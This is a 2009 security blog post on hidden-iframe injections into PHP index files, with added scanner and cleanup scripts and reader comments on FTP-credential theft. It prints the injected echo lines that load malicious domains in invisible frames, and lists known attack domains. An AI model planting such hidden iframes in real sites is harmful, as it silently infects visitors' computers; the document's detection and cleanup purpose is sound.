
Another Type of IFrame Hack (PHP Exploit)

   29 Apr 09   Filed in Website exploits

This is a quick post about yet another type of hidden iframes injected into legitimate web pages.

The HTML code may look like this:

<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Domain names vary, as does the number of iframes injected into a single web page. The distinguishing feature of this exploit is the “?click=<hex_number>” part of the URL, where <hex_number> is a hexadecimal number.

PHP code

Unlike other exploits that simply inject HTML code, in this case you may find the iframes injected as PHP code, usually only in index.php files. Here are the code snippets I encountered in Joomla and WordPress files.

WordPress
<?php
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
// the three echo lines below are the injected iframes (domain names defanged with spaces)
echo "<iframe src=\"http:// xtrarobotz . com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http:// nipkelo .net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http:// internetcountercheck . com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>

Joomla
//
// Generate the page
//
$template->pparse('body');
include($phpbb_root_path . 'includes/page_tail.'.$phpEx);
// the echo line below is the injected iframe, appended just before the closing PHP tag
echo "<iframe src=\"http:// sefauro . net/?click=1B47575\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
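As an added example (not code from the original post or from the Unmask Parasites tool), here is a small Python scanner for the signature described above: an <iframe> whose src ends in ?click=<hex> and whose attributes make it invisible (visibility:hidden, display:none or a 1x1 size). It looks at raw HTML and at the backslash-escaped form the tag takes inside a PHP echo "..." string, and reports file, line and the host the frame points at. The sample files are constructed for the example; example.net is a placeholder host, while xtrarobotz.com is taken from the post's domain list.

```python
import os
import re
import sys
from urllib.parse import urlparse

# An <iframe> whose src carries the "?click=<hex>" marker described in the post.
# "\\?" tolerates the backslash-escaped quotes seen when the tag sits inside a PHP echo "..." string.
CLICK_IFRAME_RE = re.compile(
    r'''<iframe\b[^>]*?src=\\?["']?(?P<src>https?://[^"'\\\s>]+?\?click=(?P<click>[0-9a-f]+))''',
    re.IGNORECASE,
)
# width=1 / height=1, quoted, unquoted or backslash-quoted: a 1x1 frame nobody is meant to see
SIZE_ONE_RE = re.compile(r'''\b(?:width|height)=\\?["']?1\\?["']?(?=[\s>])''', re.IGNORECASE)


def scan_text(text):
    """Return [(line_no, src_url, click_id, looks_hidden), ...] for one file's content."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in CLICK_IFRAME_RE.finditer(line):
            # cut out the whole opening tag so the style/size check sees every attribute
            tag_end = line.find(">", m.start())
            tag = line[m.start():tag_end + 1] if tag_end != -1 else line[m.start():]
            style = tag.lower().replace(" ", "")
            hidden = ("visibility:hidden" in style or "display:none" in style
                      or len(SIZE_ONE_RE.findall(tag)) == 2)
            findings.append((line_no, m.group("src"), m.group("click"), hidden))
    return findings


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Walk a web root and map each file path to its findings (files without hits are omitted)."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
            except OSError:
                continue
            if hits:
                results[path] = hits
    return results


def injected_hosts(findings):
    """Distinct hosts the injected frames point at, for comparison with the post's domain list."""
    hosts = {urlparse(src).hostname for _line, src, _click, _hidden in findings}
    return sorted(h for h in hosts if h)


# Constructed sample: an infected WordPress index.php in the shape shown in the post,
# plus a raw HTML iframe below the closing PHP tag (example.net is a placeholder host).
SAMPLE_INFECTED = '''<?php
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
echo "<iframe src=\\"http://xtrarobotz.com/?click=BC0230\\" width=1 height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";
?>
<iframe src="http://example.net/?click=14784531" width="1" height="1" style="position:absolute;visibility:hidden"></iframe>
'''
# Constructed sample of a legitimate, visible iframe that must not be reported.
SAMPLE_CLEAN = '<iframe src="https://maps.google.com/maps?q=Paris&output=embed" width="400" height="300"></iframe>\n'

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in sorted(scan_tree(root).items()):
        for line_no, src, click, hidden in hits:
            print(f"{path}:{line_no}: click={click} hidden={hidden} {src}")
```

Run it with the web root as the only argument; every reported line names the file to restore from a clean backup, and injected_hosts() gives the list of domains to compare with the one in the post.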

Malicious Domains

Most malicious domains used in this attack are blacklisted by Google, and if your site is infected it may be blacklisted too. The Safe Browsing diagnostic page in this case will say something like:

“Malicious software is hosted on 1 domain(s), including xtrarobotz.com/.”

Here is the list of known attack domains. Most of them share the same IP address: 86 .120 .92 .220. The rest are currently inaccessible (they must have been shut down).

  • xtrarobotz .com
  • goooogleadsence .biz
  • internetcountercheck .com
  • google-ana1yticz .com
  • live-counter .net
  • nipkelo .net
  • hosttracker .net
  • durnosy .com
  • ibalefo .net
  • nyoflak .com
  • peskostruikaz .com
  • bukirda .com
  • thedeadpit .com
  • sefauro .net
  • vafuiek .com
  • deisvop .net (Added: April 30, 2009)
  • webexperience13 .com (Added: April 30, 2009)
  • beidzan .com (Added: May 02, 2009)
  • klaomta .com (Added: May 02, 2009)
  • quoasty .com (Added: May 07, 2009)
  • niklejo .net (Added: May 07, 2009)
  • ruisjop .com (Added: May 07, 2009)
  • nakulpi .net (Added: May 07, 2009)
  • clifedo .net (Added: May 07, 2009)
  • neglite .com (Added: May 12, 2009)

Cleaning up

Two types of hidden iframes on the same site

Many times I’ve seen these iframes on the same sites as the .cn “income” iframes I blogged about two weeks ago. As you can see on the screenshot, both types of hidden iframes are easily detected by Unmask Parasites.

I assume this exploit uses the same infection technique, and I hope the cleanup instructions in that post will help get rid of these iframes too.

If you have more information about this exploit, want to share your experience, or have a question, please leave a comment below.


Reader's Comments (36)

  1.

    Hi.
    I have gotten this but with the iframes from the previous post.
    It is in basically EVERY index file. WordPress( + templates etc…), mediawiki. Even the album that I created in photoshop.

    Can you tell me more about HOW they do this? So I can prevent it.
    I don’t wanna get this again.

    •

      The other post speculates about how they do it and how to stop it.

      Simply put, prevent your passwords from being stolen, then change passwords and upload a clean copy of infected web pages.

  2.

    My website is infected too.
    What can I do?

  3.

    I found this virus 10 days ago and 4th of my customers got it .

    We removed it more than 10 times but the next day amazingly it was on all pages again .

    I found the source file .

    In each “Images” folder in your site it will copy a php file “image.php”.

    Before removing the script from pages , you must rewrite a same file instead of image.php and change the permissions .

    Then remove the scripts .

    If your site gets the iframe version as fast as you can , you must remove the iframe then replace the image.php .

    Because google may consider your site as a harmful site .

    A good news is that .asp files won’t get this virus .

    Another thing is that, in CMS sites, I changed the permissions of template folders!!!

  4.

    Hello Denis. First of all thanks for you post and for providing a forum to discuss this serious issue.

    Since yesterday my website got infected with this too. I downloaded all the files from the server and searched for the iframe malware and around 60 index.html files were infected.

    How do I fix it? Do I just delete the iframe code from the html files and upload the corrected files back on the server?

    Also is there any software that I can use to scan the files on the server for such malwares.

    Any other tips for removing such malwares?

    Thanks again!

  5.

    My site fell victim to this as well. All this week I have been trying to fight a virus on my machine and ended up saying f’it. Had to wipe my machine tonight.

    I noticed that you all have said just your index files fell victim. Sadly every html/php file on my site fell victim. I am in the process of going through and uploading what backups I have.

    My hell started when I was looking up how to get a certain font into sIFR. My search came across bit monster. Next thing I know AVG went off and all hell broke loose. Stay away from bit monster and don’t be an idiot like I was and click on a site that you have no idea what it is.

    I am in the process of writing a script to erase the havoc off of my site. If anyone wants me to post the script when I’m done with it let me know and I’ll try and get it up.

    •

      If the script can be used without much customization and well commented (what it does and how it works), I can post it here (with due credits)

    •

      Hello everybody,

      Thanks Denis for providing this blog in order to discuss about this bad virus.

      Arowland, I will be very interested in the script and can provide it for other persons on my web site, with the due credits too, in the security section.

      I was infected on the first day of my holidays, much stress for holidays; I’m impressed by how many persons have nothing to do but bad things.

      Many thanks for all the information provided here, and if you can share the script when it is ready it will be very appreciated.

  6.

    You can use Dreamweaver to clean up your code using regular expression search and replace.

  7.

    Just cleaned this up off a zencart site hosted on bluehost. Fortunately had a backup that’s only a few days old, but am very worried about the possibility of a repeat attack. Changing authentication everywhere after checking my machine, but otherwise have no idea how the offending IP got in. Is there a range of IPs I can block?

  8.

    Well, isn’t that just a pisser! I had to take my site down today too.

    The funny thing is, I have been developing for almost 20 years, and you get an instinct about things after that long. Well my webmaster didn’t want to use ASP, He wanted to use PHP. I really didn’t want to use PHP because ASP VB Developers are a dime a dozen, so if I needed to I could Have someone working on the site in a short time. But I relented and now I am here! Blacklisted by google and developing a bad name really fast…Great!

    Anyways My question is, what is being done to find these people, I would seriously like to find the person who did this and shoot them in the head. Well not really, I want to torture them first..Like beat them to death with a PHP book or something..

  9.

    Hi!

    Some of our sites were hacked recently. It put some extra code (iframe) into many index*.php, index*.html and default*.php files that it found (not all, maybe because there were too many of them and it stopped the attack after some period of time).

    One of our teammates within project had his laptop virused (bad that we didn’t note what virus was that). We repaired this issue, but before that he stored and used ftp login information for a day or two on that infected machine.

    I think it can work in one of two ways (which one it is, I don’t know):

    1)
    - you have machine infected with some virus/trojan
    - virus steals your login and password to ftp
    - virus sends it to its owners
    - they use some kind of bot and update index files on your ftp

    2)
    - you have machine infected with some virus/trojan
    - virus gets your login and password to ftp
    - virus logs in into ftp and updates index files on your ftp

    How do we remove it?
    - We replace all infected files that have modification date of the attack time with uninfected copies.
    - We change passwords to our ftp site.
    - We check file permissions.

  10.

    Our page currently has the viruses already mentioned; they are lodged in the php and html files and I found one in a js file. I have also seen that it created some php and html files with a warning not to delete them. The only possible solution I see is to take the page out of service “so as not to appear on Google’s blacklist”, remove the virus from all infected files (in my case it was about 2000 files, and I removed it quickly with Dreamweaver, since you can search for the specific code in each of the infected files) and, after changing all the passwords to ones with special characters for greater security, put it back online.
    I hope you find a simpler solution, since this gets a bit tedious, but anything to get our web pages running again.

  11.

    murago .su is another one i found yesterday after it hacked one of my sites, luckily got to it before google found it

  12.

    Hi,

    :(
    Just discovered today that my WordPress 2.7.1 site has been hacked with the same header iframe attack you are discussing here, but with the iframe source coming from worldnamebuy.cn.

    I thought I might mention the last thing that I did on my site prior to this occurring was delete 4 spam comments from my WordPress admin panel, which Akismet caught, but they got past Bad Behavior.

    Prior to that occurring I had upgraded my Bad Behavior software from within the plugin admin panel of WordPress. However, after the fact I later read that it would have been better to upgrade Bad Behavior from my ftp rather than from the WordPress admin panel.

    Don’t know if that created a greater vulnerability or not, but thought I would mention in hopes it may help someone here.

    Thank you for this information here! Hopefully I’ll get my site corrected before Google’s robots cruise by again. Don’t want to get black-listed!

  13.

    My friend’s sites are affected by this hack. It injects an iframe in every index.php file. His PC got infected by some virus on the same day, which stole the ftp passwords.

    We immediately detected this, changed the ftp details from some other machine and restored the files from the backup.

    so keep your ftp details safe.

  14.

    This post is a bit misleading calling this a “PHP Exploit” without explaining how this code is appended via a PHP vulnerability. It sounds as if, from reading the post, the hack is through somehow “injecting” the iframe into the files through some undefined vulnerability in PHP. However I don’t see any explanation for this.

    Rather, it seems most likely that it is not a “PHP Exploit” but simply stolen ftp information and the hack is run by a remote program that simply does a reg ex search on all files like “index.php”, “default.php”, “home.php” and maybe other patterns and simply opens the files, writes the iframe to it inside or after the body tags of the found files. Just because the sites are in php just seems to be an arbitrary target of the hackers.

    I’m guessing that the ftp credentials are obtained on computers with some kind of infected software, maybe even cracked ftp programs from file sharing, and simply added to a long list of stolen ftp credentials.

    So far I have dealt with this on two sites and simply changing the ftp credentials has been enough to suspend a return. However, that doesn’t mean that the same info can’t be obtained again with compromised machines.

    In both cases I have seen, I suspect the clients who asked for ftp credentials have infected computers. Once you give out your ftp info you can only go so far to protect it.

  15.

    I’ve found this exploit in both index.html and index.php files, but not containing “clicks=”. Here’s an example:

    For the series of websites we manage, we found 443 occurrences. As of this date, we’ve gotten rid of them all, and hope not to see them return, but are being watchful. These sites run on a remote Plesk/Linux box, so Dreamweaver search/replace wasn’t a good option. Here’s the README for the procedure, followed by the two little scripts that I used. This is not documented well, and definitely not bulletproof, so use with caution (and back up the site before you start). Note that our Plesk stores all its sites in /var/www/vhosts – your sites are probably in some other location. If you want to use this stuff, you’ll need some familiarity with *ix shell programming and the tools that go with it (I used sed and awk).

    README:

    Getting rid of exploits in a semi-automated manner:

    cd /var/www/vhosts, and run:
    fgrep -HR '<iframe' . >/tmp/filelist.txt

    Generates a file which lists the names of all files that have <iframe> tags,
    with the filename first, followed by a :, and then the line containing
    the offending tag.
    Look at the file with:
    less /tmp/filelist.txt

    Eliminate innocuous website references by running fgrep multiple times, with
    multiple output files:

    fgrep -v maps.google.com </tmp/filelist.txt >/tmp/fl1.txt

    Check what’s left and look at which websites are infected, using:
    less /tmp/fl2.txt [or whatever number]

    If there are problems, you’ll see lines like:
    ./[somedomain].com/httpdocs/IntegratedMLMFormula/index.html:

    A good quick check is also available (but not exhaustive) by simply using fgrep:
    fgrep .cn /tmp/fl2.txt

    Extract all the lines having to do with a particular website by:
    fgrep [somedomain] </tmp/fl2.txt >/tmp/websitedomainbadiframe.txt

    Insert the full path in each line of the file:
    sed 's|^\.|/var/www/vhosts|' </tmp/websitedomainbadiframe.txt >/tmp/websitedomainbadiframefullpath.txt

    Edit second line remove.sh script to use the correct filename (the one with the
    list of files we generated above: websitedomainbadiframefullpath.txt).

    Run it.

    REMOVE.SH script:
    #!/bin/bash
    myfile="/tmp/inbusfullpathbadiframe.txt"
    # $myfile is the list produced above, one "path:matching line" per line
    myline=""
    while IFS= read -r myline
    do
    # the part before the first ":" is the file name
    filename=$(echo "$myline" | cut -d: -f1)
    echo "$filename"
    # write a copy of the file without its iframe tags, then replace the original with it
    awk -f remove.awk "$filename" >"$filename+"
    mv -f "$filename+" "$filename"
    done <"$myfile"

    REMOVE.AWK script:
    BEGIN {
    proc_count = 0;
    }
    {
    # position of the opening <iframe tag; 0 when the line has none
    start = index($0, "<iframe");
    if (start == 0)
    print $0;
    else
    {
    # keep everything before the tag ...
    keepleft = substr($0, 1, start-1);
    # ... and everything after the closing "/iframe>" (8 characters long);
    # this assignment was lost in the pasted copy and is restored here
    end = index($0, "/iframe>");
    if ($0 ~ /\/iframe>$/)
    keepright = "";
    else
    keepright = substr($0, end + 8);
    print keepleft keepright;
    proc_count += 1;
    }
    }
    END {
    }
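The same cleanup as an added Python example, not the commenter's own scripts and not code from the original post: it generalizes the awk logic to whole files rather than single lines, removes only iframes whose src shows the ?click=<hex> marker from the post or points at a host from the post's list (so a legitimate maps.google.com frame is left alone, the case the README filters by hand), deletes the PHP echo statements that are left empty afterwards, and keeps a .bak copy before writing anything. The sample file is constructed; example.net is a placeholder host.

```python
import re
import shutil
import sys
from urllib.parse import urlparse

# Hosts taken from the post's list (written there with spaces so they are not clickable).
BLOCKLIST = {"xtrarobotz.com", "nipkelo.net", "internetcountercheck.com", "sefauro.net"}

# A hidden-iframe tag with an empty body, the form that gets injected: <iframe ...></iframe>
IFRAME_RE = re.compile(r'<iframe\b[^>]*>\s*</iframe>', re.IGNORECASE)
# src="...", src=\"...\" (inside a PHP string) or an unquoted src
SRC_RE = re.compile(r'''src=\\?["']?\s*(https?://[^"'\\\s>]+)''', re.IGNORECASE)
CLICK_RE = re.compile(r'\?click=[0-9a-f]+', re.IGNORECASE)
# a PHP echo statement left with nothing to print once its iframe is gone
EMPTY_ECHO_RE = re.compile(r'echo\s*"\s*"\s*;[ \t]*\r?\n?', re.IGNORECASE)


def is_injected(tag):
    """True when the iframe's src shows the ?click=<hex> marker or points at a listed host."""
    m = SRC_RE.search(tag)
    if not m:
        return False
    url = m.group(1)
    host = (urlparse(url).hostname or "").lower()
    return bool(CLICK_RE.search(url)) or host in BLOCKLIST


def clean_text(text):
    """Return (cleaned_text, number_of_iframes_removed); iframes that fail is_injected() stay."""
    removed = 0

    def drop(m):
        nonlocal removed
        if is_injected(m.group(0)):
            removed += 1
            return ""
        return m.group(0)

    cleaned = IFRAME_RE.sub(drop, text)
    if removed:
        # an injected echo "<iframe ...></iframe>"; collapses to echo ""; which we remove as well
        cleaned = EMPTY_ECHO_RE.sub("", cleaned)
    return cleaned, removed


def clean_file(path, write=False):
    """Count removable iframes in a file; with write=True rewrite it, keeping the original as <path>.bak."""
    with open(path, "r", encoding="utf-8", errors="surrogateescape") as fh:
        original = fh.read()
    cleaned, removed = clean_text(original)
    if removed and write:
        shutil.copy2(path, path + ".bak")
        with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
            fh.write(cleaned)
    return removed


# Constructed sample: one injected echo inside PHP, one raw injected iframe glued to real
# markup, and a legitimate map embed that must survive. example.net is a placeholder host.
SAMPLE = '''<?php
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
echo "<iframe src=\\"http://xtrarobotz.com/?click=BC0230\\" width=1 height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";
?>
<p>Hello</p><iframe src="http://example.net/?click=1B47575" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="https://maps.google.com/maps?q=Paris" width="400" height="300"></iframe>
'''
EXPECTED = '''<?php
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
?>
<p>Hello</p>
<iframe src="https://maps.google.com/maps?q=Paris" width="400" height="300"></iframe>
'''

if __name__ == "__main__":
    # usage: clean.py [--write] file...   (without --write it only reports counts)
    args = [a for a in sys.argv[1:] if a != "--write"]
    for path in args:
        print(f"{path}: {clean_file(path, write='--write' in sys.argv)} injected iframe(s)")
```

Run it first without --write to see how many tags each file would lose, and compare that count with what the grep pass found; a file where the numbers disagree is one to inspect by hand rather than rewrite.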

  16.

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specific hack code is:

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    * Gauge how often it’s happening
    * Share solutions
    * Expose the culprits, if possible
    * Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advice, and I plan to sweep my machine and those of other team members with FTP access (could be a virus attached to our systems), check recent plugins, scan for viruses on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do the same.

    For permanent solution read more @ http://annanta.com/?p=338

  17.

    From a comment on the same topic at: http://wordpress.org/support/topic/261886

    This is a FTP password compromise.

    Not related to WordPress.

    Make sure to upgrade your Adobe Reader to the latest version. You probably have Adobe Reader 8.0 and are using FileZilla.

    I had just installed and used the latest version of FileZilla a few days ago… So this rang a bell, although I was running Adobe Reader 9.0 (not 8.0). Nevertheless, I opened Adobe Reader 9, ran the updater, and now I get:
    “The Adobe Reader 9.1.2 Update addresses customer issues and security vulnerabilities. Adobe recommends that you always install the latest updates.”
    oops…

    Updating adobe reader, and changing ftp password… hope that resolves the issue… I’m also re-doing a full scan of my local computer again… *so embarrassing*

    •

      Listen folks, for your games, keep Windows. For work, use Linux or OS X. And for the love of God, do NOT use Adobe Acrobat Reader. It has a worse track record than Fat Albert. If you must use Windows, use Sumatra PDF or Foxit PDF, which both have a far better security record when it comes to PDF exploits.

  18.

    hello all,
    I read all the comments on this page because my site is also one of the infected ones, like yours, with iframe injections.
    But I have another solution for my site to keep it away from the viruses: I embedded some JavaScript code which removes the iframe from my index pages at onload or init() time of my page,
    and it works fine.
    If someone else also has a good solution for removing this virus attack (IFrame Attack), then please share it with me too…
    Thank you all.

    •

      It’s good that you care about your site visitors. However, I would also be concerned about the fact that your local computer is infected and that criminals have access to your site and can modify it the way they want.

  19.

    Hi web owners,

    I had that cn. Aka Gumblar on a couple of websites 3 weeks ago.

    This one looks like it’s about the same.. but I’m a security noob so maybe there are some big differences.

    Solution for gumblar is:

    Scan your pc with http://malwarebytes.org/

    Then fix your FTP passwords, don’t save them in any program and delete all the malicious code in the /index.php / html.

    Note: make sure you’re the only one who is able to connect to the FTP.

  20.

    I came across the iframe scripts on two of my websites in the past month. What I don’t understand, “call me retarded”, is why do they do this? Or what is the script supposed to do?
    The two that I came across were already blocked by Google so I have not witnessed it in execution. Might I add, I am a freshman to this invasion so this is a learning curve for me.

    •

      The scripts use browser vulnerabilities to silently infect visitors’ computers with all sorts of malicious programs that steal personal (and financial) information, send spam from infected computers, hack other legitimate web sites and do all other illegal stuff. It’s a multimillion dollar “business”.

      •

        Technically that is incorrect,
        ActiveX scripting is used to exploit (blame Microsoft; why oh why do they assume every ActiveX scripting call is safe? :sigh:)

        Simple answer for internet users: ditch Internet Explorer (if you use it) and go to Firefox, and install the NoScript add-on. Now you have control over scripting and nothing can exploit you via your browser!

  21.

    Hi

    I had the same problem and I wrote two scripts to fix my site automatically.

    I posted the solution and the script I used, the solution is here:

    http://oscarif.wordpress.com/2009/08/04/eliminacion-automatica-de-iframe-oculto/

    Unfortunately that post is in Spanish because my English is not good, but if someone wants to help me or wants to translate it to English, I’ll try to explain for a good translation.

    I hope my solution works fine and everyone can fix his site.

  22.

    If your system is completely free of viruses and spyware (I use a firewall and used four different scanners including a rootkit scanner)…

    If you change your FTP passwords often…

    If you have deleted your website and uploaded a clean version of all your files…

    But you are still being hit by iframe injections…

    Chances are you are not using Secure FTP because you either didn’t know it existed or your host doesn’t provide it. This is exactly what happened to me. All of the helpful websites that provide information about iframe injections blame viruses, trojans or insecure passwords, and most do not point to another obvious solution. GO WITH A GOOD HOST that provides secure FTP and the option to use mod_security automatically on your domain panel. I switched to DreamHost, immediately switched ON Secure FTP, switched OFF regular FTP, and switched on extra security, and the attacks have finally stopped.

    IXWebHosting was of no help and was the cause of my problem. Even after I blocked all other IP addresses than mine to FTP, I continued to get hacked. I suspect that the problem was due to insecure FTP (password easily sniffed during transmission) and insecure hosting (hacker able to access my site even though they were disallowed from FTPing to it).

    When all else fails – do some really good research and change hosts.

  23.

    Hello,
    I suffered from the same. I’m copying my M.O. here, which worked.
    I got
    /homepages/4/d134610354/htdocs/moebius77/blog2/wp-includes/default-widgets.php on line 423 as an error on my blog. No way to login or other. So:
    1) re-install all your WordPress blog, FTP it onto the server again, EXCEPT the WP-Content folder if you want to keep your images and themes.
    2) Now you should be able to login. Go to your dashboard and install plugin “Script Exploiter”.
    3) Run the plugin and look for malicious script. In my case, I had this baby:

    copied on most of my install.php files, on all the themes (default, etc.), on the plugins and others.
    4) Download the files with the added script, open them with an editor and erase all the garbage.
    5) FTP them back on the server, change your password, you should be all right.
    Cheers, hope this helps,
    Vinz

  24.

    [...] http://blog.unmaskparasites.com/2009/04/29/another-type-of-iframe-hack-php-exploit/ http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/ [...]

  25.

    We have removed the script. The site was uploaded with the IP address, and the domain was pointed to it a day after. Now if I search by name it’s absolutely fine, but other pages are still showing with the IP, which were crawled when the domain was not pointed.

    However, at some places it’s showing okay. I am not sure..

    Does it take some time?